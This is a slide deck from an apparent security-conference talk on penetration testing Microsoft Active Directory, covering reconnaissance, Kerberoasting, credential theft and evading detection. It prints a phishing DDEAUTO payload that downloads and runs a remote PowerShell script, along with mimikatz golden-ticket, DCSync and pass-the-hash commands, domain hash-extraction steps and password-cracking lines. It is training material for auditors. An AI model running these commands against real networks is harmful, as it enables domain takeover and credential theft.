Introducción a las pruebas de intrusión en entornos Microsoft Active Directory en forma de ponencia práctica para auditores o personas interesadas en el pentesting en entornos corporativos. Se dará una breve introducción al servicio de directorio Active Directory y sus componentes más críticos desde el punto de vista de la seguridad.Posteriormente, se explicarán las principales diferencias con respecto a un pentesting clásico de infraestructura, así como las técnicas y ataques más comunes para llevar a cabo el ejercicio y comprometer completamente el dominio corporativo.Requisitos: Se recomienda que los asistentes tengan conocimientos básicos de Active Directory y básicos/medios de pentesting o hacking ético, preferiblemente en infraestructuras y/o Sistemas Operativos.
2. ciyinet
WHOAMI Carlos García García
- Computer Science Engineer
- Penetration Testing and Red Teaming
- OSCP Certified
- Co-author book “Hacking Windows:
Ataques a sistemas y redes Microsoft”
2Pentesting Active Directory
3. ciyinet
WHAT ARE
WE GOING
TO TALK
ABOUT?
- Introduction to Active Directory
- Authentication Protocols
- Active Directory Penetration Testing
- Reconnaissance
- Common Attacks & Techniques
- Lateral and Vertical Movements
- How-to Avoid Being Caught
3Pentesting Active Directory
4. ciyinet
BEAR IN
MIND
- AD-related techniques
- I learn Active Directory from the
offensive side
- We lower risks and not the other
way around
- This is going to be intense
4Pentesting Active Directory
6. ciyinet
ACTIVE DIRECTORY 101
• AD is Microsoft’s answer to directory services
• Directory service is a hierarchical structure to store objects for
quick access and management of all resources
6Pentesting Active Directory
7. ciyinet
ACTIVE DIRECTORY 101
• Uses LDAP as its access protocol
• Relies on DNS as its locator service, enabling clients to locate
domain controllers through DNS queries
• AD supports several Naming Conventions
• User Principal Names (UPN):
• user@domain
• LDAP names (Distinguished Names):
• cn=common name
• ou=organizational unit
• dc=domain
• for eg. cn=ciyi, ou=Madrid, dc=Rooted, dc=CON
7Pentesting Active Directory
12. ciyinet 12
NTLM SCHEME
Pentesting Active Directory
Protocol Algorithm Secret to use
LM DES-ECB Hash LM
NTLMv1 DES-ECB Hash NT
NTLMv2 HMAC-MD5 Hash NT
14. ciyinet 14
KERBEROS SCHEME
Pentesting Active Directory
1. Client encrypts a
timestamp with his/her
hash/key
2. Client receives a TGT
signed with the domain
krbtgt account that
proves they are who
they say they are
3. The TGT is then used
to request service
tickets (TGS) for specific
resources/services on
the domain.
4. DC sends a TGS
ticket encrypted using
the hash of the
account that is
associated with that
service (SPN)
Protocol Secret to use
Kerberos
RC4 = Hash NT
AES128 key
AES256 key
27. ciyinet 27
PHISHING + DDEAUTO = RCE
• Dynamic Data Exchange (DDE): protocol for transferring data
between applications
• Valid for MS Excel, MS Word… and MS Outlook
• Recently used as macro-less Malware
DDEAUTO
"C:ProgramsMicrosoftOffice365Outlook........windowssystem
32WindowsPowerShellv1.0powershell.exe -NoP -sta -NonI -W Hidden
$e=(New-Object
System.Net.WebClient).DownloadString('http://172.16.201.201:8000/empire-
test.ps1');powershell -e $e # " "Beneficios Qurtuba"
Pentesting Active Directory
31. ciyinet
LOCAL RECONNAISSANCE
Collect information of the network, process and OS in order to
investigate what kind of machine we succeeded in infecting
Command Description
ipconfig /all Displays the IP address, subnet mask, and default gateway for all
adapters. Also info about DHCP and DNS settings
whoami /all Displays all information in the current access token, including the
current user name, security identifiers (SID), privileges, and groups that
the current user belongs to
net localgroup Displays the name of the server and the names of local groups on the
computer.
net localgroup “administrators” Displays local administrators
netstat -an Displays active TCP connections, ports on which the computer is
listening, Ethernet statistics, the IP routing table
tasklist /V Displays a list of applications and services with their Process ID (PID) for
all tasks running on either a local or a remote computer
31Pentesting Active Directory
32. ciyinet
LOCAL RECONNAISSANCE
Collect information of the network, process and OS in order to
investigate what kind of machine we succeeded in infecting
Command Description
net start Lists started Windows services
sc qc <SERVICE> Gets the parameters for an individual service
accesschk.exe -ucqv
<SERVICE>
Determine service access control rules (accesschk.exe is part of Microsoft
Sysinternals suite)
systeminfo > info_output.txt Displays detailed configuration information about a computer and its
operating system, including operating system configuration, security
information, product ID, and hardware properties, such as RAM, disk space,
and network cards
schtasks /query /fo LIST /v list of scheduled tasks: whether they are recurring, where the task can be
found and its parameters, as well as, crucially, what permissions they are run
with
dir, type, findstr Browse and search for information in the local file system.
32Pentesting Active Directory
33. ciyinet
NETWORK RECONNAISSANCE
Command Description
ping ☺
echo %USERDOMAIN% Domain name which the host is joined to
echo %logonserver% Obtains the name of the Domain Controller the host used to
authenticate toset logonserver
net group /domain Lists existing groups in the domain
net group <GROUP NAME>/domain Lists members of a group.
I.e: “domain computers”, “domain controllers”, “domain admins”
net localgroup administrators /domain Gets members of the built-in group “Administrators”
Collect information of the network, process and OS in order to
investigate what kind of machine we succeeded in infecting
33Pentesting Active Directory
34. ciyinet
NETWORK RECONNAISSANCE
Command Description
net user /domain Lists all users within the domaindominio actual
net user <ACCOUNT NAME> /domain Obtains detailed information about a user given his username
net view Displays a list of domains, computers, or resources that are being
shared by the specified computer. Used without parameters, net
view displays a list of computers in your current domain
net use Access to shared resources
net accounts /domain Obtains the domain password policy
nltest /domain_trusts Maps trust relationships
Collect information of the network, process and OS in order to
investigate what kind of machine we succeeded in infecting
34Pentesting Active Directory
37. ciyinet 37
COMMON ATTACKS & TECHNIQUES
• Passwords in SYSVOL & Group Policy Preferences – 10%
• Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5%
• Kerberos TGS Service Ticket Cracking (Kerberoast) – 20%
• SMB Shares Mining – 75%
• Credential Theft Shuffle (“Mimikatz dance”) – 60%
Reference:
https://adsecurity.org/?p=2362
Pentesting Active Directory
38. ciyinet 38
COMMON ATTACKS & TECHNIQUES
• Passwords in SYSVOL & Group Policy Preferences – 10%
• Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5%
• Kerberos TGS Service Ticket Cracking (Kerberoast) – 20%
• SMB Shares Mining – 75%
• Credential Theft Shuffle (“Mimikatz dance”) – 60%
Reference:
https://adsecurity.org/?p=2362
Pentesting Active Directory
39. ciyinet 39
KERBEROAST
Pentesting Active Directory
1. Client encrypts a
timestamp with his/her
hash/key
2. Client receives a TGT
signed with the domain
krbtgt account that
proves they are who
they say they are
3. The TGT is then used
to request service
tickets (TGS) for specific
resources/services on
the domain.
4. DC sends a TGS
ticket encrypted using
the hash of the
account that is
associated with that
service (SPN)
Attacker
40. ciyinet 40
KERBEROAST
• Offline brute force of password of service account within service tickets (TGS)
• No risk of detection
• No account lockouts
• Invoke-Kerberoast from PowerView (dev) to collect hashes
• Focus on user accounts. They have shorter passwords
• JohnTheRipper (magnumripper) to crack them
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/magnumripper/JohnTheRipper
Pentesting Active Directory
41. ciyinet 41
SMB SHARES MINING
• Usually very fruitful, but sometimes boring and time consuming
• Enumerating shares in the environment and looking for data with hardcoded creds
(scripts, config files), backups, documentation…
PowerView Find-ShareDomain
• Searches for computer shares on the domain. If -CheckShareAccess is passed, then only
shares the current user has read access to are returned.
smbmap
• Intended to simplify searching for potentially sensitive data across large networks.
• Enumerates samba share drives across an entire domain. List drives, permissions, contents,
upload/download functionality, file name auto-download pattern matching, etc.
Reference:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/ShawnDEvans/smbmap
Pentesting Active Directory
43. ciyinet 43
CREDENTIAL THEFT SHUFFLE
• Escalating privileges on some machine
• Extracting creds/hashes from memory
• Derivative administrator
• User hunting: moving laterally and repeating the attack till Domain
Admin level is reached
References:
https://github.com/gentilkiwi/mimikatz
Pentesting Active Directory
“Mimikatz dance”
47. ciyinet 47
USER HUNTING
• Invoke-UserHunter (PowerView)
• BloodHound
1. Gets groups and group members of each group
2. Lists domain computers
3. Obtains local admins for each computer
4. Lists active sessions on each computer
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/BloodHoundAD/BloodHound
Pentesting Active Directory
56. ciyinetPentesting Active Directory 56
PASS-THE-TICKET
• Inject Kerberos tickets
• Tickets must be in Kerberos credential format (KRB_CRED) -
http://tools.ietf.org/html/rfc4120#section-5.8
• Kerberos module does not require any privilege. It uses official
Microsoft Kerberos API
mimikatz.exe "kerberos::ptt FILENAME"
57. ciyinet 57
GOLDEN TICKET Encrypted with KRBTGT hash
Attacker
TGT:
• Username
• Groups
membership
• …
krbtgt:hash
Pentesting Active Directory
58. ciyinet 58
GOLDEN TICKET
KRBTGT hash can be used to generate arbitrary TGT:
• Made by the attacker, not KDC
• Anything can be pushed inside
mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH
/user:USERNAME /id:ID /groups:500,501,513,512,520,518,519 /ptt"
Pentesting Active Directory
60. ciyinet 60
DCSYNC
• It “impersonates” a Domain Controller and requests account
password data from the targeted Domain Controller
• Replicates the user credentials via GetNCChanges (Directory
Replication Service (DRS) Remote Protocol)
• Special rights are required to run DCSync
mimikatz.exe "lsadump::dcsync /dc:DC /domain:DOMAIN /user:USERNAME" exit
mimikatz.exe "lsadump::dcsync /all /csv" exit
Pentesting Active Directory
62. ciyinetPentesting Active Directory 62
DCSHADOW
Register new domain controllers to inject malicious AD objects
and so create backdoors or any kind of illegitimate access or
right
Reference:
https://blog.alsid.eu/dcshadow-explained-4510f52fc19d
Hi guys! This is
DCShadow!
68. ciyinet
NTDS.DIT
How-to get hashes from it:
1. Decrypt Password Encryption Key (PEK). PEK is encrypted using
bootkey
2. Hashes decryption first round with PEK using RC4
3. Hashes decryption second round with DES
68Pentesting Active Directory
69. ciyinet 69
GRAB NTDS.DIT AND SYSTEM
Volume Shadow Copy
Ntdsutil
Invoke-NinjaCopy
Invoke-NinjaCopy –Path “C:WindowsNTDSntds.dit” –LocalDestination
“C:ntds.dit”
Invoke-NinjaCopy –Path “C:WindowsSystem32configSYSTEM” –LocalDestination
“C:SYSTEM”
ntdsutil "ac i ntds" "ifm" "create full c:copy-ntds" quit quit
vssadmin create shadow /for=C:
Pentesting Active Directory
72. ciyinet
John the Ripper
Hashcat & Rockyou wordlist
72
CRACKING NT HASHES
john FILE_HASHES --format=NT
hashcat -a 0 -m 1000 --username FILE_HASHES /usr/share/wordlists/rockyou.txt
--potfile-path OUTPUT_NT.pot
Pentesting Active Directory
77. ciyinet 77
PASS-THE-HASH
Pentesting Active Directory
• Based on local Security events
• Not capture by ATA by default
• Force NTLM to be used
• Overpass-the-hash: Encryption downgrade is detected
mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME
/ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM " exit
78. ciyinet 78
PASS-THE-HASH
Pentesting Active Directory
• Based on local Security events
• Not capture by ATA by default
• Force NTLM to be used
• Overpass-the-hash: Encryption downgrade is detected
mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME
/ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM " exit
80. ciyinet 80
GOLDEN TICKET
• Same as overpass-the-hash
• Detection based on lifetime
• Default ticket lifetime in AD is 10 hours
mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH
/aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600
/renewmax:10080 /user:USERNAME /ptt"
Pentesting Active Directory
81. ciyinet 81
GOLDEN TICKET
• Same as overpass-the-hash
• Detection based on lifetime
• Default ticket lifetime in AD is 10 hours
mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH
/aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600
/renewmax:10080 /user:USERNAME /ptt"
Pentesting Active Directory
82. ciyinet 82
GOLDEN TICKET
• Same as overpass-the-hash
• Detection based on lifetime
• Default ticket lifetime in AD is 10 hours
mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH
/aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600
/renewmax:10080 /user:USERNAME /ptt"
Pentesting Active Directory
83. ciyinet 83
DCSYNC
DRS traffic (DSGetNCChanges) from a non-DC to a DC system
can be detected
Pentesting Active Directory
84. ciyinet 84
DCSYNC
DRS traffic (DSGetNCChanges) from a non-DC to a DC system
can be detected
Microsoft ATA Attacker
Pentesting Active Directory
93. ciyinet 93
BUSINESS RISK
Compromise of just one Domain Admin account in the Active Directory
exposes the entire organization to risk. The attacker would have unrestricted
access to all resources managed by the domain, all users, servers,
workstations and data.
Moreover, the attacker could instantly establish persistence in the Active
Directory environment, which is difficult to notice and cannot be efficiently
remediated with guarantees.
“Once domain admin, always domain admin”
Pentesting Active Directory
94. ciyinet 94
ACKNOWLEDGMENT & REFERENCES
• Miroslav Sotak and TVM team
• FWHIBBIT
• RootedCON and any other Sec Community in Spain
Pentesting Active Directory